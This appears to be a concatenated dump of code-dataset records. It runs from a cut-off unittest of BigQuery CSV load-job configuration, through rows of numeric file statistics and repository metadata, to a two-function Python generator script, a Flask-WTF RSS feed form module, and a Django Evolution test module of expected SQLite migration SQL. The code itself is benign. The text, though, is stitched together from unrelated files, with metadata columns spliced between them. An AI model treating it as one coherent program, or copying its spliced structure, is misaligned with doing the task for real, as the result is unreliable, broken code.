'allowQuotedNewlines': True,
'autodetect': False,
'createDisposition': 'CREATE_NEVER',
'destinationTableProperties': {},
'encoding': 'UTF-8',
'fieldDelimiter': ',',
'ignoreUnknownValues': True,
'maxBadRecords': 0,
'quote': '"',
'schemaUpdateOptions': None,
'skipLeadingRows': '1',
'sourceFormat': 'CSV',
'writeDisposition': 'WRITE_APPEND'
}
self.assertEqual(out.to_api_repr()['load'], expectations)
def test_load_job_config_dumb_variant(self):
records_format = DelimitedRecordsFormat(variant='dumb')
processing_instructions = ProcessingInstructions(fail_if_dont_understand=True,
fail_if_cant_handle_hint=True,
fail_if_row_invalid=True)
load_plan = RecordsLoadPlan(processing_instructions=processing_instructions,
records_format=records_format)
unhandled_hints = set(records_format.hints.keys())
out = load_job_config(unhandled_hints, load_plan)
complain_on_unhandled_hints(processing_instructions.fail_if_dont_understand,
unhandled_hints, records_format.hints)
expectations = {
'allowJaggedRows': False,
'autodetect': False,
'createDisposition': 'CREATE_NEVER',
'destinationTableProperties': {},
'encoding': 'UTF-8',
'fieldDelimiter': ',',
'ignoreUnknownValues': True,
'maxBadRecords': 0,
'quote': '',
'schemaUpdateOptions': None,
'skipLeadingRows': '0',
'sourceFormat': 'CSV',
'writeDisposition': 'WRITE_APPEND'
}
self.assertEqual(out.to_api_repr()['load'], expectations)
def test_load_job_config_bluelabs(self):
records_format = DelimitedRecordsFormat(variant='bluelabs')
processing_instructions = ProcessingInstructions(fail_if_dont_understand=True,
fail_if_cant_handle_hint=True,
fail_if_row_invalid=True)
load_plan = RecordsLoadPlan(processing_instructions=processing_instructions,
records_format=records_format)
unhandled_hints = set(records_format.hints.keys())
with self.assertRaisesRegex(NotImplementedError,
r"Implement hint escape='\\\\' or try again "
"with fail_if_cant_handle_hint=False"):
load_job_config(unhandled_hints, load_plan)
def test_load_job_config_csv(self):
records_format = DelimitedRecordsFormat(variant='csv')
processing_instructions = ProcessingInstructions(fail_if_dont_understand=True,
fail_if_cant_handle_hint=True,
fail_if_row_invalid=True)
load_plan = RecordsLoadPlan(processing_instructions=processing_instructions,
records_format=records_format)
unhandled_hints = set(records_format.hints.keys())
with self.assertRaisesRegex(NotImplementedError,
r"Implement hint dateformat='MM/DD/YY' or try again "
"with fail_if_cant_handle_hint=False"):
load_job_config(unhandled_hints, load_plan)
def test_load_job_config_vertica(self):
records_format = DelimitedRecordsFormat(variant='vertica')
processing_instructions = ProcessingInstructions(fail_if_dont_understand=True,
fail_if_cant_handle_hint=True,
fail_if_row_invalid=True)
load_plan = RecordsLoadPlan(processing_instructions=processing_instructions,
records_format=records_format)
unhandled_hints = set(records_format.hints.keys())
with self.assertRaisesRegex(NotImplementedError,
r"Implement hint record-terminator='\\x02' "
"or try again with fail_if_cant_handle_hint=False"):
load_job_config(unhandled_hints, load_plan)
| 55.084906
| 89
| 0.600959
| 498
| 5,839
| 6.662651
| 0.184739
| 0.090115
| 0.047016
| 0.038577
| 0.848704
| 0.801085
| 0.769138
| 0.769138
| 0.769138
| 0.769138
| 0
| 0.00204
| 0.32831
| 5,839
| 105
| 90
| 55.609524
| 0.843957
| 0
| 0
| 0.714286
| 0
| 0
| 0.129303
| 0.032197
| 0
| 0
| 0
| 0
| 0.05102
| 1
| 0.05102
| false
| 0
| 0.061224
| 0
| 0.122449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
885939170e64c118508ceff8484f82d22800fb16
| 147
|
py
|
Python
|
Curso_Python.py/prueba15.py
|
elviscruz45/Python_avanzado
|
259c5f4dcccfe71fefcff86484f36672a22caefb
|
[
"MIT"
] | null | null | null |
Curso_Python.py/prueba15.py
|
elviscruz45/Python_avanzado
|
259c5f4dcccfe71fefcff86484f36672a22caefb
|
[
"MIT"
] | null | null | null |
Curso_Python.py/prueba15.py
|
elviscruz45/Python_avanzado
|
259c5f4dcccfe71fefcff86484f36672a22caefb
|
[
"MIT"
] | null | null | null |
def funcion():
return 5
def generador():
yield 1,2,3,4,5,6,7,8,9
print(generador())
print(generador())
print(generador())
| 11.307692
| 27
| 0.578231
| 22
| 147
| 3.863636
| 0.681818
| 0.494118
| 0.447059
| 0.658824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09009
| 0.244898
| 147
| 12
| 28
| 12.25
| 0.675676
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| true
| 0
| 0
| 0.142857
| 0.428571
| 0.428571
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 1
|
0
| 8
|
ee634f42e477062cb6c8e19f0b9c2f60630103fc
| 777
|
py
|
Python
|
rss_skill/forms.py
|
frybin/Alexa-Python-Skill
|
b729d303524a7e7b72c9becb7b7044afea6597fc
|
[
"MIT"
] | null | null | null |
rss_skill/forms.py
|
frybin/Alexa-Python-Skill
|
b729d303524a7e7b72c9becb7b7044afea6597fc
|
[
"MIT"
] | null | null | null |
rss_skill/forms.py
|
frybin/Alexa-Python-Skill
|
b729d303524a7e7b72c9becb7b7044afea6597fc
|
[
"MIT"
] | null | null | null |
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
class AddFeedForm(FlaskForm):
name = StringField('RSS Feed Name', validators=[DataRequired()])
link = StringField('RSS Feed Link', validators=[DataRequired()])
article_1 = StringField('RSS Feed Tag 1', validators=[DataRequired()])
article_2 = StringField('RSS Feed Tag 2')
submit = SubmitField('Add Feed')
class EditFeedForm(FlaskForm):
name = StringField('RSS Feed Name', validators=[DataRequired()])
link = StringField('RSS Feed Link', validators=[DataRequired()])
article_1 = StringField('RSS Feed Tag 1', validators=[DataRequired()])
article_2 = StringField('RSS Feed Tag 2')
submit = SubmitField('Edit Feed')
| 43.166667
| 74
| 0.728443
| 89
| 777
| 6.303371
| 0.269663
| 0.199643
| 0.256684
| 0.149733
| 0.727273
| 0.727273
| 0.727273
| 0.727273
| 0.727273
| 0.727273
| 0
| 0.012121
| 0.150579
| 777
| 17
| 75
| 45.705882
| 0.837879
| 0
| 0
| 0.533333
| 0
| 0
| 0.160875
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
ee7a9c0aedbf40eb5aba9956a8c82f50fb6eca73
| 116,189
|
py
|
Python
|
django_evolution/tests/db/sqlite3.py
|
beanbaginc/django-evolution
|
fb76e44a2361a69a440dca086c0cc67ac6a4300d
|
[
"BSD-3-Clause"
] | 18
|
2015-02-08T14:48:02.000Z
|
2021-08-03T21:07:37.000Z
|
django_evolution/tests/db/sqlite3.py
|
beanbaginc/django-evolution
|
fb76e44a2361a69a440dca086c0cc67ac6a4300d
|
[
"BSD-3-Clause"
] | 4
|
2015-01-07T01:15:08.000Z
|
2020-08-06T06:52:13.000Z
|
django_evolution/tests/db/sqlite3.py
|
beanbaginc/django-evolution
|
fb76e44a2361a69a440dca086c0cc67ac6a4300d
|
[
"BSD-3-Clause"
] | 13
|
2015-01-07T01:06:21.000Z
|
2022-02-20T16:27:41.000Z
|
from __future__ import unicode_literals
import re
import django
from django.db.backends.sqlite3.base import Database
from django_evolution.tests.utils import (make_generate_index_name,
make_generate_unique_constraint_name)
django_version = django.VERSION[:2]
sqlite_version = Database.sqlite_version_info[:2]
if django_version < (2, 0) or django_version >= (3, 1):
DESC = ' DESC'
else:
DESC = 'DESC'
def add_field(connection):
"""SQL test statements for the AddFieldTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
try:
# Django >= 1.8
data_types_suffix = connection.data_types_suffix
except AttributeError:
try:
# Django == 1.7
data_types_suffix = connection.creation.data_types_suffix
except AttributeError:
# Django < 1.7
data_types_suffix = {}
def get_field_suffix(field_type):
try:
return ' %s' % data_types_suffix[field_type]
except KeyError:
return ''
generate_index_name = make_generate_index_name(connection)
generate_unique_constraint_name = \
make_generate_unique_constraint_name(connection)
mappings = {
'AddNonNullNonCallableColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "added_field" integer NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
' "added_field")'
' SELECT "id", "char_field", "int_field", 1'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'AddNonNullCallableColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "added_field" integer NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
' "added_field")'
' SELECT "id", "char_field", "int_field", "int_field"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'AddNullColumnWithInitialColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "added_field" integer NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
' "added_field")'
' SELECT "id", "char_field", "int_field", 1'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'AddStringColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "added_field" varchar(10) NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
' "added_field")'
' SELECT "id", "char_field", "int_field", \'abc\\\'s xyz\''
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'AddBlankStringColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "added_field" varchar(10) NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
' "added_field")'
' SELECT "id", "char_field", "int_field", \'\''
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'AddDateColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "added_field" datetime NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
' "added_field")'
' SELECT "id", "char_field", "int_field", 2007-12-13 16:42:00'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'AddDefaultColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "added_field" integer NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
' "added_field")'
' SELECT "id", "char_field", "int_field", 42'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'AddMismatchInitialBoolColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "added_field" bool NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
' "added_field")'
' SELECT "id", "char_field", "int_field", 0'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'AddEmptyStringDefaultColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "added_field" varchar(20) NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
' "added_field")'
' SELECT "id", "char_field", "int_field", \'\''
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'AddNullColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("int_field" integer NOT NULL,'
' "id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "added_field" integer NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("int_field", "id", "char_field")'
' SELECT "int_field", "id", "char_field"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'NonDefaultColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "non-default_column" integer NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field")'
' SELECT "id", "char_field", "int_field"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'AddColumnCustomTableModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "value" integer NOT NULL,'
' "alt_value" varchar(20) NOT NULL,'
' "added_field" integer NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "value", "alt_value")'
' SELECT "id", "value", "alt_value"'
' FROM "custom_table_name";',
'DROP TABLE "custom_table_name";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "custom_table_name";',
],
'AddIndexedColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "add_field" integer NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field")'
' SELECT "id", "char_field", "int_field"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("add_field");'
% generate_index_name('tests_testmodel', 'add_field',
'add_field'),
],
'AddUniqueColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "added_field" integer NULL UNIQUE);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field")'
' SELECT "id", "char_field", "int_field"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'AddUniqueIndexedModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "added_field" integer NULL UNIQUE);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field")'
' SELECT "id", "char_field", "int_field"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'AddForeignKeyModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "added_field_id" integer NULL'
' REFERENCES "tests_addanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field")'
' SELECT "id", "char_field", "int_field"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("added_field_id");'
% generate_index_name('tests_testmodel', 'added_field_id',
'added_field'),
],
}
if django_version >= (2, 0):
mappings.update({
'AddManyToManyDatabaseTableModel': [
'CREATE TABLE "tests_testmodel_added_field" '
'("id" integer NOT NULL PRIMARY KEY%s,'
' "testmodel_id" integer NOT NULL'
' REFERENCES "tests_testmodel" ("id")'
' DEFERRABLE INITIALLY DEFERRED,'
' "addanchor1_id" integer NOT NULL'
' REFERENCES "tests_addanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED'
');'
% get_field_suffix('AutoField'),
'CREATE UNIQUE INDEX "%s" ON'
' "tests_testmodel_added_field"'
' ("testmodel_id", "addanchor1_id");'
% generate_unique_constraint_name(
'tests_testmodel_added_field',
['testmodel_id', 'addanchor1_id']),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("testmodel_id");'
% generate_index_name('tests_testmodel_added_field',
'testmodel_id'),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("addanchor1_id");'
% generate_index_name('tests_testmodel_added_field',
'addanchor1_id'),
],
'AddManyToManyNonDefaultDatabaseTableModel': [
'CREATE TABLE "tests_testmodel_added_field" '
'("id" integer NOT NULL PRIMARY KEY%s,'
' "testmodel_id" integer NOT NULL'
' REFERENCES "tests_testmodel" ("id")'
' DEFERRABLE INITIALLY DEFERRED,'
' "addanchor2_id" integer NOT NULL'
' REFERENCES "custom_add_anchor_table" ("id")'
' DEFERRABLE INITIALLY DEFERRED'
');'
% get_field_suffix('AutoField'),
'CREATE UNIQUE INDEX "%s" ON'
' "tests_testmodel_added_field"'
' ("testmodel_id", "addanchor2_id");'
% generate_unique_constraint_name(
'tests_testmodel_added_field',
['testmodel_id', 'addanchor2_id']),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("testmodel_id");'
% generate_index_name('tests_testmodel_added_field',
'testmodel_id'),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("addanchor2_id");'
% generate_index_name('tests_testmodel_added_field',
'addanchor2_id'),
],
'AddManyToManySelf': [
'CREATE TABLE "tests_testmodel_added_field" '
'("id" integer NOT NULL PRIMARY KEY%s,'
' "from_testmodel_id" integer NOT NULL'
' REFERENCES "tests_testmodel" ("id")'
' DEFERRABLE INITIALLY DEFERRED,'
' "to_testmodel_id" integer NOT NULL'
' REFERENCES "tests_testmodel" ("id")'
' DEFERRABLE INITIALLY DEFERRED'
');'
% get_field_suffix('AutoField'),
'CREATE UNIQUE INDEX "%s" ON "tests_testmodel_added_field"'
' ("from_testmodel_id", "to_testmodel_id");'
% generate_unique_constraint_name(
'tests_testmodel_added_field',
['from_testmodel_id', 'to_testmodel_id']),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("from_testmodel_id");'
% generate_index_name('tests_testmodel_added_field',
'from_testmodel_id'),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("to_testmodel_id");'
% generate_index_name('tests_testmodel_added_field',
'to_testmodel_id'),
],
})
elif django_version >= (1, 9):
mappings.update({
'AddManyToManyDatabaseTableModel': [
'CREATE TABLE "tests_testmodel_added_field" '
'("id" integer NOT NULL PRIMARY KEY%s,'
' "testmodel_id" integer NOT NULL'
' REFERENCES "tests_testmodel" ("id"),'
' "addanchor1_id" integer NOT NULL'
' REFERENCES "tests_addanchor1" ("id")'
');'
% get_field_suffix('AutoField'),
'CREATE UNIQUE INDEX "%s" ON'
' "tests_testmodel_added_field"'
' ("testmodel_id", "addanchor1_id");'
% generate_unique_constraint_name(
'tests_testmodel_added_field',
['testmodel_id', 'addanchor1_id']),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("testmodel_id");'
% generate_index_name('tests_testmodel_added_field',
'testmodel_id'),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("addanchor1_id");'
% generate_index_name('tests_testmodel_added_field',
'addanchor1_id'),
],
'AddManyToManyNonDefaultDatabaseTableModel': [
'CREATE TABLE "tests_testmodel_added_field" '
'("id" integer NOT NULL PRIMARY KEY%s,'
' "testmodel_id" integer NOT NULL'
' REFERENCES "tests_testmodel" ("id"),'
' "addanchor2_id" integer NOT NULL'
' REFERENCES "custom_add_anchor_table" ("id")'
');'
% get_field_suffix('AutoField'),
'CREATE UNIQUE INDEX "%s" ON'
' "tests_testmodel_added_field"'
' ("testmodel_id", "addanchor2_id");'
% generate_unique_constraint_name(
'tests_testmodel_added_field',
['testmodel_id', 'addanchor2_id']),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("testmodel_id");'
% generate_index_name('tests_testmodel_added_field',
'testmodel_id'),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("addanchor2_id");'
% generate_index_name('tests_testmodel_added_field',
'addanchor2_id'),
],
'AddManyToManySelf': [
'CREATE TABLE "tests_testmodel_added_field" '
'("id" integer NOT NULL PRIMARY KEY%s,'
' "from_testmodel_id" integer NOT NULL'
' REFERENCES "tests_testmodel" ("id"),'
' "to_testmodel_id" integer NOT NULL'
' REFERENCES "tests_testmodel" ("id")'
');'
% get_field_suffix('AutoField'),
'CREATE UNIQUE INDEX "%s" ON "tests_testmodel_added_field"'
' ("from_testmodel_id", "to_testmodel_id");'
% generate_unique_constraint_name(
'tests_testmodel_added_field',
['from_testmodel_id', 'to_testmodel_id']),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("from_testmodel_id");'
% generate_index_name('tests_testmodel_added_field',
'from_testmodel_id'),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("to_testmodel_id");'
% generate_index_name('tests_testmodel_added_field',
'to_testmodel_id'),
],
})
elif django_version >= (1, 7):
mappings.update({
'AddManyToManyDatabaseTableModel': [
'CREATE TABLE "tests_testmodel_added_field" '
'("id" integer NOT NULL PRIMARY KEY%s,'
' "testmodel_id" integer NOT NULL'
' REFERENCES "tests_testmodel" ("id"),'
' "addanchor1_id" integer NOT NULL'
' REFERENCES "tests_addanchor1" ("id"),'
' UNIQUE ("testmodel_id", "addanchor1_id")'
');'
% get_field_suffix('AutoField'),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("testmodel_id");'
% generate_index_name('tests_testmodel_added_field',
'testmodel_id'),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("addanchor1_id");'
% generate_index_name('tests_testmodel_added_field',
'addanchor1_id'),
],
'AddManyToManyNonDefaultDatabaseTableModel': [
'CREATE TABLE "tests_testmodel_added_field" '
'("id" integer NOT NULL PRIMARY KEY%s,'
' "testmodel_id" integer NOT NULL'
' REFERENCES "tests_testmodel" ("id"),'
' "addanchor2_id" integer NOT NULL'
' REFERENCES "custom_add_anchor_table" ("id"),'
' UNIQUE ("testmodel_id", "addanchor2_id")'
');'
% get_field_suffix('AutoField'),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("testmodel_id");'
% generate_index_name('tests_testmodel_added_field',
'testmodel_id'),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("addanchor2_id");'
% generate_index_name('tests_testmodel_added_field',
'addanchor2_id'),
],
'AddManyToManySelf': [
'CREATE TABLE "tests_testmodel_added_field" '
'("id" integer NOT NULL PRIMARY KEY%s,'
' "from_testmodel_id" integer NOT NULL'
' REFERENCES "tests_testmodel" ("id"),'
' "to_testmodel_id" integer NOT NULL'
' REFERENCES "tests_testmodel" ("id"),'
' UNIQUE ("from_testmodel_id", "to_testmodel_id")'
');'
% get_field_suffix('AutoField'),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("from_testmodel_id");'
% generate_index_name('tests_testmodel_added_field',
'from_testmodel_id'),
'CREATE INDEX "%s" ON'
' "tests_testmodel_added_field" ("to_testmodel_id");'
% generate_index_name('tests_testmodel_added_field',
'to_testmodel_id'),
],
})
else:
mappings.update({
'AddManyToManyDatabaseTableModel': [
'CREATE TABLE "tests_testmodel_added_field" (',
' "id" integer NOT NULL PRIMARY KEY%s,'
% get_field_suffix('AutoField'),
' "testmodel_id" integer NOT NULL,',
' "addanchor1_id" integer NOT NULL,',
' UNIQUE ("testmodel_id", "addanchor1_id")',
')',
';',
],
'AddManyToManyNonDefaultDatabaseTableModel': [
'CREATE TABLE "tests_testmodel_added_field" (',
' "id" integer NOT NULL PRIMARY KEY%s,'
% get_field_suffix('AutoField'),
' "testmodel_id" integer NOT NULL,',
' "addanchor2_id" integer NOT NULL,',
' UNIQUE ("testmodel_id", "addanchor2_id")',
')',
';',
],
'AddManyToManySelf': [
'CREATE TABLE "tests_testmodel_added_field" (',
' "id" integer NOT NULL PRIMARY KEY%s,'
% get_field_suffix('AutoField'),
' "from_testmodel_id" integer NOT NULL,',
' "to_testmodel_id" integer NOT NULL,',
' UNIQUE ("from_testmodel_id", "to_testmodel_id")',
')',
';',
],
})
return mappings
def delete_field(connection):
"""SQL test statements for the DeleteFieldTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
generate_index_name = make_generate_index_name(connection)
return {
'DefaultNamedColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "non-default_db_column" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "fk_field1_id" integer NOT NULL'
' REFERENCES "tests_deleteanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "char_field", "non-default_db_column", "int_field3",'
' "fk_field1_id")'
' SELECT "my_id", "char_field", "non-default_db_column",'
' "int_field3", "fk_field1_id"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field1_id");'
% generate_index_name('tests_testmodel', 'fk_field1_id',
'fk_field1'),
],
'NonDefaultNamedColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "fk_field1_id" integer NOT NULL'
' REFERENCES "tests_deleteanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "char_field", "int_field", "int_field3",'
' "fk_field1_id")'
' SELECT "my_id", "char_field", "int_field", "int_field3",'
' "fk_field1_id"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field1_id");'
% generate_index_name('tests_testmodel', 'fk_field1_id',
'fk_field1'),
],
'ConstrainedColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "non-default_db_column" integer NOT NULL,'
' "fk_field1_id" integer NOT NULL'
' REFERENCES "tests_deleteanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "char_field", "int_field", "non-default_db_column",'
' "fk_field1_id")'
' SELECT "my_id", "char_field", "int_field",'
' "non-default_db_column", "fk_field1_id"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field1_id");'
% generate_index_name('tests_testmodel', 'fk_field1_id',
'fk_field1'),
],
'DefaultManyToManyModel': [
'DROP TABLE "tests_testmodel_m2m_field1";',
],
'NonDefaultManyToManyModel': [
'DROP TABLE "non-default_m2m_table";',
],
'DeleteForeignKeyModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "non-default_db_column" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "char_field", "int_field", "non-default_db_column",'
' "int_field3")'
' SELECT "my_id", "char_field", "int_field",'
' "non-default_db_column", "int_field3"'
' FROM "tests_testmodel";',
